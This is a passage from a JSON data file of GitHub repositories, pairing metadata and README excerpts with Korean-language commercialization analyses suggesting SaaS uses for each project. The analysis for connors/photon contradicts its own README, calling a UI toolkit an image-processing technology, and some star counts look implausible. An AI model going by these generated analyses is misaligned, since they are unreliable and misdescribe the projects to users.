对平台每个功能编写的案例代码，可以阅读每个示例代码来学习各功能，与官网功能示例一致效果。\n\n| 说明 | 教程  | 视频  |Github源码 | 国内Gitee源码  |    \n| ----|---","composite_score":0.0421,"license_safety_tag":"safe"},{"name":"badoo/Chatto","github_url":"https://github.com/badoo/Chatto","stars":5,"language":"Swift","license":"mit","abandonment_months":2,"description":"# Chatto 저장소 분석\n\n## 왜 보물인가\n채팅 기능을 쉽게 앱에 추가할 수 있는 기본 틀을 제공하는 오픈소스라 개발 비용과 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **팀 협업 도구(SaaS)**: 회사 내부 직원들이 실시간으로 대화하고 파일을 공유하는 메시징 플랫폼\n2. **고객 지원 시스템(내부 도구)**: 고객센터 직원들","readme_excerpt":"# Chatto [![Build Status](https://travis-ci.org/badoo/Chatto.svg?branch=master)](https://travis-ci.org/badoo/Chatto) [![codecov.io](https://codecov.io/github/badoo/Chatto/coverage.svg?branch=master)](https://codecov.io/github/badoo/Chatto?branch=master) [![CocoaPods Compatible](https://img.shields.io/cocoapods/v/Chatto.svg)](https://img.shields.io/cocoapods/v/Chatto.svg) [![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n\n\n`Chatto` is a Swift lightweight framework to build chat applications. It's been designed to be extensible and performant. Along with `Chatto` there is `ChattoAdditions`, a companion framework which includes cells for messages and an extensible input component. You can find more details about how it was implemented in our [blog](https://techblog.badoo.com/blog/2015/12/04/how-we-made-chatto/). See them in action!\n<div align=\"center\">\n<img src=\"./readme-images/readme-pic-1.png\" />\n<img s","composite_score":0.0421,"license_safety_tag":"safe"},{"name":"jvm-profiling-tools/async-profiler","github_url":"https://github.com/jvm-profiling-tools/async-profiler","stars":7,"language":"C++","license":"apache-2.0","abandonment_months":0,"description":"# Async-Profiler 상용화 분석\n\n## 왜 보물인가\n소프트웨어가 느려질 때 어느 부분이 문제인지 정확히 찾아주는 도구로, 기업들의 서비스 성능 개선에 직접적인 비용 절감을 가져올 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 모니터링 서비스**\n- 개발사가 고객 소프트웨어의 성능을 실시간으로 분석해주는 클라우드 서비스 (예: 자동차","readme_excerpt":"# Async-profiler\n\nThis project is a low overhead sampling profiler for Java\nthat does not suffer from the [Safepoint bias problem](http://psy-lob-saw.blogspot.ru/2016/02/why-most-sampling-java-profilers-are.html).\nIt features HotSpot-specific API to collect stack traces\nand to track memory allocations. The profiler works with\nOpenJDK and other Java runtimes based on the HotSpot JVM.\n\nUnlike traditional Java profilers, async-profiler monitors non-Java threads\n(e.g., GC and JIT compiler threads) and shows native and kernel frames in stack traces.\n\nWhat can be profiled:\n\n- CPU time\n- Allocations in Java Heap\n- Native memory allocations and leaks\n- Contended locks\n- Hardware and software performance counters like cache misses, page faults, context switches\n- and [more](docs/ProfilingModes.md).\n\nSee our [3 hours playlist](https://www.youtube.com/playlist?list=PLNCLTEx3B8h4Yo_WvKWdLvI9mj1XpTKBr)\nto learn about more features.\n\n# Download\n\n### Stable release: [4.4](https://github.com/async-pro","composite_score":0.0419,"license_safety_tag":"safe"},{"name":"opengapps/opengapps","github_url":"https://github.com/opengapps/opengapps","stars":7,"language":"Shell","license":"NOASSERTION","abandonment_months":0,"description":"# OpenGAPPS 저장소 분석\n\n## 왜 보물인가\n안드로이드 스마트폰에 구글 앱(지메일, 구글 맵 등)을 설치할 수 있게 해주는 도구로, 구글 서비스가 제한된 지역이나 기기의 사용자들이 필요로 하는 핵심 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트폰 커스터마이징 앱**: 사용자가 원하는 구글 앱만 선택해서 설치하는 SaaS 앱 스토어 서비스","readme_excerpt":"# Open GApps\n\n## Getting the latest pre-built Open GApps\n\nThe latest version of pre-built Open GApps can be found at <https://opengapps.org>, hosted on SourceForge.\n\n|                                                                             [Support Project](http://opengapps.org/donate) | [![Donate](https://img.shields.io/badge/donate-on%20paypal-009cde.svg?maxAge=86400)](http://opengapps.org/donate)                                                     |\n| -------------------------------------------------------------------------------------------------------------------------: | :-------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n|                                                      [Q&A Forum](http://forum.xda-developers.com/showthread.php?t=3124506) | [![XDA Q&A](https://img.shields.io/badge/Q%26A-on%20xda-de7300.svg?maxAge=86400)](http://forum.xda-developers.com/sho","composite_score":0.0419,"license_safety_tag":"unknown"},{"name":"aykevl/tinygo","github_url":"https://github.com/aykevl/tinygo","stars":5,"language":"Go","license":"NOASSERTION","abandonment_months":0,"description":"# TinyGo 저장소 분석\n\n## 왜 보물인가\n작은 기기(스마트폰, IoT 센서 등)를 프로그래밍하는 것을 매우 간단하게 만드는 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **IoT 기기 관리 SaaS**: 스마트홈, 산업용 센서 등 수많은 소형 기기를 클라우드에서 제어하고 모니터링하는 웹 서비스\n2. **임베디드 시스템 개발 플랫폼**: 하드웨","readme_excerpt":"# TinyGo - Go compiler for small places\n\n[![Linux](https://github.com/tinygo-org/tinygo/actions/workflows/linux.yml/badge.svg?branch=dev)](https://github.com/tinygo-org/tinygo/actions/workflows/linux.yml) [![macOS](https://github.com/tinygo-org/tinygo/actions/workflows/build-macos.yml/badge.svg?branch=dev)](https://github.com/tinygo-org/tinygo/actions/workflows/build-macos.yml) [![Windows](https://github.com/tinygo-org/tinygo/actions/workflows/windows.yml/badge.svg?branch=dev)](https://github.com/tinygo-org/tinygo/actions/workflows/windows.yml) [![Docker](https://github.com/tinygo-org/tinygo/actions/workflows/docker.yml/badge.svg?branch=dev)](https://github.com/tinygo-org/tinygo/actions/workflows/docker.yml) [![Nix](https://github.com/tinygo-org/tinygo/actions/workflows/nix.yml/badge.svg?branch=dev)](https://github.com/tinygo-org/tinygo/actions/workflows/nix.yml)\n\nTinyGo is a Go compiler intended for use in small places such as microcontrollers, WebAssembly (wasm/wasi), and command-lin","composite_score":0.0418,"license_safety_tag":"unknown"},{"name":"Kyome22/RunCat_for_windows","github_url":"https://github.com/Kyome22/RunCat_for_windows","stars":49,"language":"C#","license":"Apache-2.0","abandonment_months":1,"description":"# RunCat_for_windows 분석\n\n## 왜 보물인가\nWindows 작업표시줄에 달리는 고양이 애니메이션으로 컴퓨터 성능을 시각적으로 보여주는, 심플하면서도 실용적인 모니터링 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: PC 건강 상태를 실시간으로 모니터링하는 웹 기반 관리 서비스로 판매\n2. **내부 업무 도구**: 기업","readme_excerpt":"# RunCat 365\n\n**A cute running cat animation on your Windows Taskbar.**\n\n> [!CAUTION]\n>\n> - This project is for Windows, so we do not accept inquiries about macOS version.\n> - We do not accept issues or pull requests in languages other than English.\n> - Issues that do not follow the Issue Template will be closed without question.\n\n[![Github issues](https://img.shields.io/github/issues/Kyome22/RunCat365)](https://github.com/Kyome22/RunCat365/issues)\n[![Github forks](https://img.shields.io/github/forks/Kyome22/RunCat365)](https://github.com/Kyome22/RunCat365/network/members)\n[![Github stars](https://img.shields.io/github/stars/Kyome22/RunCat365)](https://github.com/Kyome22/RunCat365/stargazers)\n[![Top language](https://img.shields.io/github/languages/top/Kyome22/RunCat365)](https://github.com/Kyome22/RunCat365/)\n[![Release](https://img.shields.io/github/v/release/Kyome22/RunCat365)]()\n[![Github license](https://img.shields.io/github/license/Kyome22/RunCat365)](https://github.com/Kyome22/","composite_score":0.0418,"license_safety_tag":"safe"},{"name":"DanceTrack/DanceTrack","github_url":"https://github.com/DanceTrack/DanceTrack","stars":17,"language":"Python","license":"MIT","abandonment_months":2,"description":"# DanceTrack 상용화 분석\n\n## 왜 보물인가\n춤과 무용 영상을 자동으로 분석하고 추적하는 기술로, 댄스 교육·공연·피트니스 산업에서 즉시 활용 가능한 실용적 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n온라인 댄스 레슨 플랫폼에서 학생의 동작을 자동 분석하여 \"왼쪽 팔 각도 5도 더 올려주세요\" 같은 실시간 피드백을 제","readme_excerpt":"# DanceTrack\n\nDanceTrack is a benchmark for tracking multiple objects in uniform appearance and diverse motion.\n\nDanceTrack provides box and identity annotations. It contains 100 videos, 40 for training(annotations public), 25 for validation(annotations public) and 35 for testing(annotations unpublic). For evaluating on test set, please see [CodaBench](https://www.codabench.org/competitions/14885/). We also have a [Project Page](https://dancetrack.github.io/) for exhibition. \n\n<div align=\"center\"><img src=\"assets/demo.jpg\" ></div>\n</br>\n\n## Paper (CVPR2022)\n[DanceTrack: Multi-Object Tracking in Uniform Appearance and Diverse Motion](https://arxiv.org/abs/2111.14690)\n\n\n## News\n- (03/2026) We updated the benchmark website to [CodaBench](https://www.codabench.org/competitions/14885/) because Codalab has been discontinued.\n- (05/2023) We list some awesome research papers and projects here you may find interesting. Welcome new pull request to add new links !\n- (04/2022) We are organizing [M","composite_score":0.0417,"license_safety_tag":"safe"},{"name":"rusty1s/pytorch_sparse","github_url":"https://github.com/rusty1s/pytorch_sparse","stars":5,"language":"Python","license":"MIT","abandonment_months":2,"description":"# PyTorch Sparse 저장소 분석\n\n## 왜 보물인가\n대량의 데이터를 처리할 때 컴퓨터 자원을 효율적으로 사용하는 기술로, 인공지능 학습 속도를 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **추천 시스템 SaaS**: 수백만 개의 상품-고객 관계 데이터를 빠르게 분석하는 추천 엔진 서비스\n- **의료 영상 분석 API**: CT·M","readme_excerpt":"[pypi-image]: https://badge.fury.io/py/torch-sparse.svg\n[pypi-url]: https://pypi.python.org/pypi/torch-sparse\n[testing-image]: https://github.com/rusty1s/pytorch_sparse/actions/workflows/testing.yml/badge.svg\n[testing-url]: https://github.com/rusty1s/pytorch_sparse/actions/workflows/testing.yml\n[linting-image]: https://github.com/rusty1s/pytorch_sparse/actions/workflows/linting.yml/badge.svg\n[linting-url]: https://github.com/rusty1s/pytorch_sparse/actions/workflows/linting.yml\n[coverage-image]: https://codecov.io/gh/rusty1s/pytorch_sparse/branch/master/graph/badge.svg\n[coverage-url]: https://codecov.io/github/rusty1s/pytorch_sparse?branch=master\n\n# PyTorch Sparse\n\n[![PyPI Version][pypi-image]][pypi-url]\n[![Testing Status][testing-image]][testing-url]\n[![Linting Status][linting-image]][linting-url]\n[![Code Coverage][coverage-image]][coverage-url]\n\n--------------------------------------------------------------------------------\n\nThis package consists of a small extension library of optim","composite_score":0.0415,"license_safety_tag":"safe"},{"name":"epoberezkin/ajv","github_url":"https://github.com/epoberezkin/ajv","stars":5,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# AJV 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 입력한 데이터가 올바른 형식인지 자동으로 검증해주는 오픈소스 도구로, 전 세계 개발자들이 광범위하게 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 가입 폼, 프로필 설정 등에서 사용자 입력값이 정확한지 실시간 확인하는 기능\n- **내부 업무 도구**: 직원들이","readme_excerpt":"<img align=\"right\" alt=\"Ajv logo\" width=\"160\" src=\"https://ajv.js.org/img/ajv.svg\">\n\n&nbsp;\n\n# Ajv JSON schema validator\n\nThe fastest JSON validator for Node.js and browser.\n\nSupports JSON Schema draft-04/06/07/2019-09/2020-12 ([draft-04 support](https://ajv.js.org/json-schema.html#draft-04) requires ajv-draft-04 package) and JSON Type Definition [RFC8927](https://datatracker.ietf.org/doc/rfc8927/).\n\n[![build](https://github.com/ajv-validator/ajv/actions/workflows/build.yml/badge.svg)](https://github.com/ajv-validator/ajv/actions?query=workflow%3Abuild)\n[![npm](https://img.shields.io/npm/v/ajv.svg)](https://www.npmjs.com/package/ajv)\n[![npm downloads](https://img.shields.io/npm/dm/ajv.svg)](https://www.npmjs.com/package/ajv)\n[![Coverage Status](https://coveralls.io/repos/github/ajv-validator/ajv/badge.svg?branch=master)](https://coveralls.io/github/ajv-validator/ajv?branch=master)\n[![SimpleX](https://img.shields.io/badge/chat-on%20SimpleX-70F0F9)](https://simplex.chat/contact#/?v=1-2&s","composite_score":0.0415,"license_safety_tag":"safe"},{"name":"connors/photon","github_url":"https://github.com/connors/photon","stars":5,"language":"CSS","license":"mit","abandonment_months":2,"description":"# connors/photon 상용화 분석\n\n## 왜 보물인가\n빛과 관련된 시각적 처리 기술로, 사진 편집이나 이미지 최적화가 필요한 모든 디지털 서비스의 핵심 기능이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 사진 편집 도구로 구독 모델 서비스 제공\n- **내부 업무 도구**: e-커머스 업체의 상품 사진 자동 최적화","readme_excerpt":"# [Photon](http://photonkit.com/)\n\n[![Build Status](https://img.shields.io/travis/connors/photon/master.svg)](https://travis-ci.org/connors/photon)\n\nUI toolkit for building desktop apps with Electron.\n\n## Getting started\n\n* Clone the repo with `git clone https://github.com/connors/photon.git`\n* [Read the docs](http://photonkit.com) to learn about the components and how to get your new application started\n\nTake note that our master branch is our active, unstable development branch and that if you're looking to download a stable copy of the repo, check the [tagged downloads](https://github.com/connors/photon/tags).\n\n### What's included\n\nWithin the download you'll find the following directories and files, logically grouping common assets. You'll see something like this:\n\n```\nphoton/\n├── css/\n│   ├── photon.css\n├── fonts/\n│   ├── photon-entypo.eot\n│   ├── photon-entypo.svg\n│   ├── photon-entypo.ttf\n│   └── photon-entypo.woff\n└── template-app/\n    ├── js/\n    │   └── menu.js\n    ├── app.js\n","composite_score":0.0415,"license_safety_tag":"safe"},{"name":"googleapis/google-api-java-client","github_url":"https://github.com/googleapis/google-api-java-client","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":1,"description":"# Google API Java Client 저장소 분석\n\n## 왜 보물인가\n구글의 공식 도구로, 구글 서비스(메일, 드라이브, 유튜브 등)를 자신의 앱에 연결하려는 개발자들이 반드시 필요로 하는 핵심 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 구글 캘린더 정보를 자동으로 동기화하는 팀 협업 도구\n2. **내부 업무 도구*","readme_excerpt":"# Google APIs Client Library for Java\n\n## Description\n\nThe Google APIs Client Library for Java is a flexible, efficient, and powerful Java client library\nfor accessing any HTTP-based API on the web, not just Google APIs.\n\nThe library has the following features:\n - A powerful [OAuth 2.0](https://github.com/googleapis/google-api-java-client/wiki/OAuth2) library with a consistent interface.\n - Lightweight, efficient XML and JSON data models that support any data schema.\n - Support for [protocol buffers](https://github.com/google/protobuf/).\n - A set of [generated libraries for Google APIs](https://github.com/googleapis/google-api-java-client-services#supported-google-apis).\n\n## Supported Java environments\n\n- Java 7 (or higher)\n- Android 1.6 (or higher)\n- [Google App Engine](https://github.com/googleapis/google-api-java-client/wiki/App-Engine)\n\n## Usage\n\nFor detailed instructions on usage, please visit the [guide](https://developers.google.com/api-client-library/java).\n\n## Installation\n\nTh","composite_score":0.0414,"license_safety_tag":"safe"},{"name":"mozilla/sops","github_url":"https://github.com/mozilla/sops","stars":7,"language":"Go","license":"MPL-2.0","abandonment_months":0,"description":"# mozilla/sops 분석 보고서\n\n## 왜 보물인가\n회사의 민감한 정보(비밀번호, API 키 등)를 안전하게 암호화해서 저장하고 관리할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 설정 관리 플랫폼으로 제공하여 기업들이 구독료를 내고 사용하게 함\n2. **내부 업무 도구**: 엔터프라이즈 소프트","readme_excerpt":"SOPS: Secrets OPerationS\n========================\n\n**SOPS** is an editor of encrypted files that supports YAML, JSON, ENV, INI and BINARY\nformats and encrypts with AWS KMS, GCP KMS, Azure Key Vault, HuaweiCloud KMS, age, and PGP.\n(`demo <https://www.youtube.com/watch?v=YTEVyLXFiq0>`_)\n\n.. image:: https://i.imgur.com/X0TM5NI.gif\n\n------------\n\n.. image:: https://pkg.go.dev/badge/github.com/getsops/sops/v3.svg\n    :target: https://pkg.go.dev/github.com/getsops/sops/v3\n\nDocumentation\n-------------\n\nYou can find the SOPS documentation on `getsops.io <https://getsops.io/>`_ under `\"Docs\" <https://getsops.io/docs/>`_.\n\nSecurity\n--------\n\nPlease report any security issues privately using `GitHub's advisory form <https://github.com/getsops/sops/security/advisories>`_.\n\nLicense\n-------\n\nMozilla Public License Version 2.0\n\nAuthors\n-------\n\nSOPS was initially launched as a project at Mozilla in 2015 and has been\ngraciously donated to the CNCF as a Sandbox project in 2023, now under the\nstewardshi","composite_score":0.0412,"license_safety_tag":"unknown"},{"name":"denysdovhan/spaceship-prompt","github_url":"https://github.com/denysdovhan/spaceship-prompt","stars":9,"language":"Shell","license":"MIT","abandonment_months":0,"description":"# Spaceship Prompt 상용화 분석\n\n## 왜 보물인가\n터미널(검은 화면)을 예쁘고 사용하기 편하게 꾸며주는 오픈소스 도구로, 개발자의 작업 효율을 높이면서도 무료로 배포할 수 있다는 점이 매력적입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자용 SaaS 서비스**: 터미널 커스터마이징 클라우드 플랫폼 (설정 자동 동기화, 팀 공유 기능 포함)","readme_excerpt":"[![SWUbanner](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner-direct-single.svg)](https://stand-with-ukraine.pp.ua/)\n\n<h1 align=\"center\">\n  <a href=\"https://github.com/spaceship-prompt/spaceship-prompt\">\n    <img alt=\"spaceship →~ prompt\" src=\"https://cloud.githubusercontent.com/assets/3459374/21679181/46e24706-d34b-11e6-82ee-5efb3d2ba70f.png\" width=\"400\">\n  </a>\n  <br>Spaceship Prompt 🚀⭐<br>\n</h1>\n\n<h4 align=\"center\">\n  Minimalistic, powerful and extremely customizable <a href=\"http://zsh.org\" target=\"_blank\"><code>Zsh</code></a> prompt\n</h4>\n\n<p align=\"center\">\n  <a href=\"https://npmjs.org/package/spaceship-prompt\">\n    <img src=\"https://img.shields.io/npm/v/spaceship-prompt.svg?style=flat-square\"\n      alt=\"NPM Version\" />\n  </a>\n\n  <a href=\"https://github.com/spaceship-prompt/spaceship-prompt/actions\">\n    <img src=\"https://img.shields.io/github/actions/workflow/status/spaceship-prompt/spaceship-prompt/validate.yaml?style=flat-square\"\n      alt=\"GitHub Wo","composite_score":0.041,"license_safety_tag":"safe"},{"name":"kelektiv/node-uuid","github_url":"https://github.com/kelektiv/node-uuid","stars":5,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# node-uuid 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자·데이터·거래를 구별하는 고유한 '신분증 번호'를 만드는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 회원가입 시 각 사용자에게 고유 ID를 자동 부여하는 가입 시스템\n2. **내부 업무 도구**: 엑셀이나 데이터베이스에서 각 거래건·문서·주문마다 ","readme_excerpt":"<!--\n  -- This file is auto-generated from README_js.md. Changes should be made there.\n  -->\n\n# uuid [![CI](https://github.com/uuidjs/uuid/workflows/CI/badge.svg)](https://github.com/uuidjs/uuid/actions?query=workflow%3ACI) [![Browser](https://github.com/uuidjs/uuid/workflows/Browser/badge.svg)](https://github.com/uuidjs/uuid/actions/workflows/browser.yml)\n\nFor the creation of [RFC9562](https://www.rfc-editor.org/rfc/rfc9562.html) (formerly [RFC4122](https://www.rfc-editor.org/rfc/rfc4122.html)) UUIDs\n\n- **Complete** - Support for all RFC9562 UUID versions\n- **Cross-platform** - Support for...\n  - [Typescript](#support)\n  - [Chrome, Safari, Firefox, and Edge](#support)\n  - [NodeJS](#support)\n  - [React Native / Expo](#react-native--expo)\n- **Secure** - Uses modern `crypto` API for random values\n- **Compact** - Zero-dependency, [tree-shakable](https://developer.mozilla.org/en-US/docs/Glossary/Tree_shaking)\n- **CLI** - [`uuid` command line](#command-line) utility\n\n<!-- prettier-ignore --","composite_score":0.0409,"license_safety_tag":"safe"},{"name":"sunglok/3dv_tutorial","github_url":"https://github.com/sunglok/3dv_tutorial","stars":7,"language":"CMake","license":"NOASSERTION","abandonment_months":2,"description":"# sunglok/3dv_tutorial 상용화 분석\n\n## 왜 보물인가\n3차원 영상 처리 기술을 누구나 따라할 수 있도록 정리한 교육 자료로, 드론·자율주행·의료영상 등 첨단 산업의 핵심 기술을 대중화할 수 있는 기반입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 건축사·도시계획자를 위한 \"드론 촬영 사진을 3D 지도로 변환하는 웹 도구\"","readme_excerpt":"## An Invitation to 3D Vision: A Tutorial for Everyone\r\n_An Invitation to 3D Vision_ is an introductory tutorial on _3D computer vision_ (a.k.a. _geometric vision_ or _visual geometry_ or _multiple-view geometry_). It aims to help beginners understand the basic theories of 3D vision and implement practical applications using [OpenCV](https://opencv.org/).\r\nIn addition to tutorial slides, example codes are provided for educational purposes. They include simple but interesting and practical applications. The example codes are kept as short as possible (mostly __less than 100 lines__) to be clear and easy to understand.\r\n\r\n* To clone this repository (codes and slides): `git clone https://github.com/mint-lab/3dv_tutorial.git`\r\n* To fork this repository to your GitHub account: [Click here](https://github.com/mint-lab/3dv_tutorial/fork)\r\n* To download codes and slides as a ZIP file: [Click here](https://github.com/mint-lab/3dv_tutorial/archive/master.zip)\r\n* :memo: [How to run example codes ","composite_score":0.0409,"license_safety_tag":"unknown"},{"name":"deepmind/robotics","github_url":"https://github.com/deepmind/robotics","stars":7,"language":"Python","license":"Apache-2.0","abandonment_months":2,"description":"# DeepMind Robotics 저장소 분석\n\n## 왜 보물인가\nDeepMind(구글의 AI 연구팀)가 만든 로봇 기술로, 산업용 로봇을 더 똑똑하고 자동으로 움직이게 해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **제조업체용 SaaS**: 공장의 로봇팔이 스스로 상황을 판단하고 작업을 수행하는 자동화 소프트웨어 구독 서비스\n2. **물류센","readme_excerpt":"# `dm_robotics`: Libraries, tools, and tasks created and used for Robotics research at DeepMind.\n\n**IMPORTANT** This project is no longer maintained. The last available release\nis 0.10.0\n\n## Package overview\n| Package | Summary |\n| ---- | ---- |\n| [Transformations](py/transformations/README.md) | Rigid body transformations |\n| [Geometry](py/geometry/README.md) | Scene and Robot geometry primitives |\n| [Vision](py/vision/README.md) | Visual blob detection and tracking |\n| [AgentFlow](py/agentflow/README.md) | Reinforcement Learning agent composition library |\n| [Manipulation](py/manipulation/README.md) | \"RGB\" object meshes for manipulation tasks |\n| [MoMa](py/moma/README.md) | Manipulation environment definition library, for simulated and real robots |\n| [Controllers](cpp/controllers/README.md) | QP-optimization based cartesian controller |\n| [Controller Bindings](cpp/controllers_py/README.md) | Python bindings for the controller |\n| [Least Squares QP](cpp/least_squares_qp/README.md) |","composite_score":0.0408,"license_safety_tag":"safe"},{"name":"billziss-gh/winfsp","github_url":"https://github.com/billziss-gh/winfsp","stars":6,"language":"C","license":"NOASSERTION","abandonment_months":1,"description":"# WinFSP 저장소 분석\n\n## 왜 보물인가\n윈도우 컴퓨터에서 새로운 저장장치나 폴더처럼 작동하는 프로그램을 만들 수 있는 기술로, 클라우드 저장소나 특수 파일 시스템을 윈도우와 자연스럽게 연결해주는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 저장소 SaaS**\n구글 드라이브, 드롭박스처럼 인터넷 저장소를 윈도우 파일 탐색기에서 ","readme_excerpt":"<h1 align=\"center\">WinFsp &middot; Windows File System Proxy</h1>\n\n<p align=\"center\">\n    <img src=\"art/winfsp-glow.png\" width=\"128\"/>\n    <br/>\n    <br/>\n    <i>WinFsp enables developers to write their own file systems (i.e. \"Windows drives\") as user mode programs and without any knowledge of Windows kernel programming. It is similar to FUSE (Filesystem in Userspace) for Linux and other UNIX-like computers.</i>\n    <br/>\n    <br/>\n    <a href=\"https://winfsp.dev\"><b>winfsp.dev</b></a>\n    <br/>\n    <br/>\n    <a href=\"https://github.com/winfsp/winfsp/releases/latest\"><img src=\"https://img.shields.io/github/release/winfsp/winfsp.svg?label=stable&style=for-the-badge&logo=data:image/svg%2bxml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA0ODAgNDgwIj48cGF0aCBkPSJNMzg3LjAwMiAyMDEuMDAxQzM3Mi45OTggMTMyLjAwMiAzMTIuOTk4IDgwIDI0MCA4MGMtNTcuOTk4IDAtMTA3Ljk5OCAzMi45OTgtMTMyLjk5OCA4MS4wMDFDNDcuMDAyIDE2Ny4wMDIgMCAyMTcuOTk4IDAgMjgwYzAgNjUuOTk2IDUzLjk5OSAxMjAgMTIwIDEyMG","composite_score":0.0406,"license_safety_tag":"unknown"},{"name":"matplotlib/cheatsheets","github_url":"https://github.com/matplotlib/cheatsheets","stars":11,"language":"Python","license":"BSD-2-Clause","abandonment_months":0,"description":"# matplotlib/cheatsheets 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터 시각화 도구를 간단한 참고 자료로 정리해 누구나 쉽게 배울 수 있도록 한 실용적인 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **데이터 분석 교육 플랫폼**: 초보자용 온라인 강좌나 데이터 분석 학습 앱에 내장하여 학생들이 쉽게 참고하도록 제공\n2. **기업","readme_excerpt":"# Cheatsheets for Matplotlib users\n\n## Cheatsheets\nCheatsheet [(download pdf)](https://matplotlib.org/cheatsheets/cheatsheets.pdf) | |\n:------------------------------------------------------------------------------:|:----------------------------------------------------------:\n![](https://matplotlib.org/cheatsheets/cheatsheets-1.png)                       | ![](https://matplotlib.org/cheatsheets/cheatsheets-2.png)\n\n## Handouts\n\nBeginner handout [(download pdf)](https://matplotlib.org/cheatsheets/handout-beginner.pdf) | Intermediate handout [(download pdf)](https://matplotlib.org/cheatsheets/handout-intermediate.pdf) | Tips handout [(download pdf)](https://matplotlib.org/cheatsheets/handout-tips.pdf)\n:-----------------------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------:|:----------------------------------------------------------------------------------:\n![](https://ma","composite_score":0.0405,"license_safety_tag":"safe"},{"name":"codemirror/codemirror.next","github_url":"https://github.com/codemirror/codemirror.next","stars":8,"language":"JavaScript","license":"NOASSERTION","abandonment_months":1,"description":"# CodeMirror.next 저장소 분석\n\n## 왜 보물인가\n웹 브라우저에서 코드를 직접 작성하고 편집할 수 있는 도구로, 온라인 개발 환경이나 교육 플랫폼 구축의 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 학생들이 브라우저에서 직접 프로그래밍을 배우고 실습할 수 있는 서비스\n2. **클라우드 개발 도구**: 별","readme_excerpt":"**This repository has moved to https://code.haverbeke.berlin/codemirror/dev**\n\n# CodeMirror\n\n[ [**WEBSITE**](https://codemirror.net/) | [**DOCS**](https://codemirror.net/docs/ref/#view) | [**ISSUES**](https://code.haverbeke.berlin/codemirror/dev/issues) | [**FORUM**](https://discuss.codemirror.net/) ]\n\n<!-- [![Build Status](https://github.com/codemirror/dev/workflows/main/badge.svg)](https://github.com/codemirror/codemirror.next/actions) -->\n\nThis is the central repository for [CodeMirror](https://codemirror.net/). It holds the bug tracker and development scripts.\n\nIf you want to **use** CodeMirror, install the separate packages from npm, and ignore the contents of this repository. If you want to **develop on** CodeMirror, this repository provides scripts to install and work with the various packages.\n\nTo get started, make sure you are running [node.js](https://nodejs.org/) version 16. After cloning the repository, run\n\n    node bin/cm.js install\n\nto clone the packages that make up the","composite_score":0.0404,"license_safety_tag":"unknown"},{"name":"David-OConnor/pyflow","github_url":"https://github.com/David-OConnor/pyflow","stars":6,"language":"Rust","license":"MIT","abandonment_months":2,"description":"# pyflow 보물 분석\n\n## 왜 보물인가\nPython 프로젝트의 의존성을 자동으로 관리해주는 도구로, 개발자들이 복잡한 라이브러리 충돌 문제를 쉽게 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Python 코드를 클라우드에서 자동 실행해주는 서비스에 내장하여 사용자가 쉽게 코드를 배포하도록 지원\n2. **내부 업무 도","readme_excerpt":"[![crates.io version](https://img.shields.io/crates/v/pyflow.svg)](https://crates.io/crates/pyflow)\n[![Build Status](https://travis-ci.org/David-OConnor/pyflow.svg?branch=master)](https://travis-ci.org/David-OConnor/pyflow)\n\n\n# Pyflow\n\n#### *Simple is better than complex* - The Zen of Python\n\nPyflow streamlines working with Python projects and files. Objectives: \"Just works\", and fast. It's an easy-to-use CLI app which manages python dependency and interpreter versions.\n\nExample use, including setting up a project and switching Py versions: ![Demonstration](https://raw.githubusercontent.com/david-oconnor/pyflow/master/demo.gif)\n\nIf your project's already configured, the only command you need is `pyflow`, or `pyflow myscript.py`; setting up Python and its dependencies are automatic.\n\n**Goals**: Make using and publishing Python projects as simple as possible. Actively managing Python environments shouldn't be required to use dependencies safely. We're attempting to fix each stumbling blo","composite_score":0.0404,"license_safety_tag":"safe"},{"name":"redox-os/redox","github_url":"https://github.com/redox-os/redox","stars":5,"language":"Rust","license":"mit","abandonment_months":0,"description":"# Redox OS 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터의 핵심 기본 소프트웨어(운영체제)를 현대적인 방식으로 새로 만드는 프로젝트로, 기존 시스템의 문제점을 근본적으로 해결할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **임베디드 기기 제조사**: IoT 기기, 스마트홈 장비 등 소형 전자기기의 기본 운영체제로 라이센싱\n2. **클라우드 인","readme_excerpt":"<p align=\"center\">\n<img alt=\"Redox\" width=\"346\" src=\"https://gitlab.redox-os.org/redox-os/assets/raw/master/logos/redox/logo.png\">\n</p>\n\nThis repository is the **Build System** for Redox OS.\n\nRedox is under active development by a vibrant community, you can see the key links below:\n\n- [The **main website** for Redox 